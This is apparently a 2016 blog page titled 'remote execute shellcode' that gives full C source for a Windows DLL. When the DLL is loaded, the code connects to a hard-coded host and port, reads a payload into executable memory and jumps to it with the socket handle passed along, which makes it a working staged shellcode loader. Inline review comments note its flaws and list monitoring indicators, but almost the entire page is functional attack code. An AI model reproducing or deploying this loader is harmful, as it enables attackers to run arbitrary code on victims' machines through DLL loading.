远程执行shellcode
2016-06-13 10:21
#include "Windows.h"
#include <WinSock2.h>
#include <stdio.h>
#pragma comment(lib,"WS2_32.lib")

/*
 * shellcode_execute: opens a TCP connection to a hard-coded address, reads a
 * length field followed by that many bytes into executable memory, and
 * transfers control to those bytes.
 *
 * Returns 0 on every failure path shown below. The success path has no
 * return statement even though the function is declared int.
 *
 * Review notes (defender's view):
 *  - The received bytes are executed without any authentication or integrity
 *    check, so whichever host answers on the configured address and port
 *    decides what runs inside the loading process.
 *  - Behaviours visible to monitoring: an outbound TCP connection made while
 *    a DLL is being loaded, a PAGE_EXECUTE_READWRITE allocation, and
 *    execution from memory that is not backed by an image file.
 */
int shellcode_execute()
{
    WSADATA wsData;
    /* Request Winsock 2.2; a non-zero result means initialisation failed. */
    if(WSAStartup(MAKEWORD(2,2),&wsData))
    {
        printf("WSAStartp fail.\n");
        return 0;
    }

    /* NOTE(review): the socket handle is not compared with INVALID_SOCKET
       before it is used. */
    SOCKET sock = WSASocket(AF_INET,SOCK_STREAM,0,0,0,0);
    SOCKADDR_IN server;
    ZeroMemory(&server,sizeof(SOCKADDR_IN));
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = inet_addr("192.168.127.132"); //server ip
    server.sin_port = htons(8888); //server port
    if(SOCKET_ERROR == connect(sock,(SOCKADDR*)&server,sizeof(server)))
    {
        printf("connect to server fail.\n");
        closesocket(sock);
        WSACleanup();
        return 0;
    }

    /* The first sizeof(u_int) bytes from the peer are taken as the payload
       length. The value is used as-is: no upper bound and no byte-order
       conversion are applied. */
    u_int payloadLen;
    if (recv(sock,(char*)&payloadLen,sizeof(payloadLen),0) != sizeof(payloadLen))
    {
        printf("recv error\n");
        closesocket(sock);
        WSACleanup();
        return 0;
    }

    /* Committed memory that is readable, writable and executable at once.
       NOTE(review): the result is not checked for NULL. */
    char* orig_buffer = (char*)VirtualAlloc(NULL,payloadLen,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
    char* buffer = orig_buffer;
    int ret = 0;
    /* Read until payloadLen bytes have arrived or recv stops returning data.
       NOTE(review): buffer and payloadLen are adjusted by ret before ret is
       tested, so a negative ret still moves both; the code below also runs
       whether or not the full length was received. */
    do
    {
        ret = recv(sock,buffer,payloadLen,0);
        buffer += ret;
        payloadLen -= ret;
    } while (ret > 0 && payloadLen > 0);

    /* Execute the received bytes (MSVC inline assembly, 32-bit x86 only).
       The socket handle is placed in EDI before the jump; presumably the
       received code expects to find it there -- not shown on this page. */
    __asm
    {
        mov edi,sock;
        jmp orig_buffer;
    }

    /* Only reached if the received code transfers control back to this
       point; a jmp pushes no return address. The socket and Winsock are not
       released on this path. */
    VirtualFree(orig_buffer,0,MEM_RELEASE);
}

/*
 * DllMain: DLL entry point. Calls shellcode_execute() when the DLL is mapped
 * into a process, so the network download and execution above happen as a
 * side effect of loading the library. Always returns TRUE.
 *
 * NOTE(review): DllMain runs while the loader lock is held; Microsoft's
 * guidance is to avoid network and other blocking work here.
 */
BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        shellcode_execute();
        /* no break: falls through to the shared break below, which has no
           further effect */
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}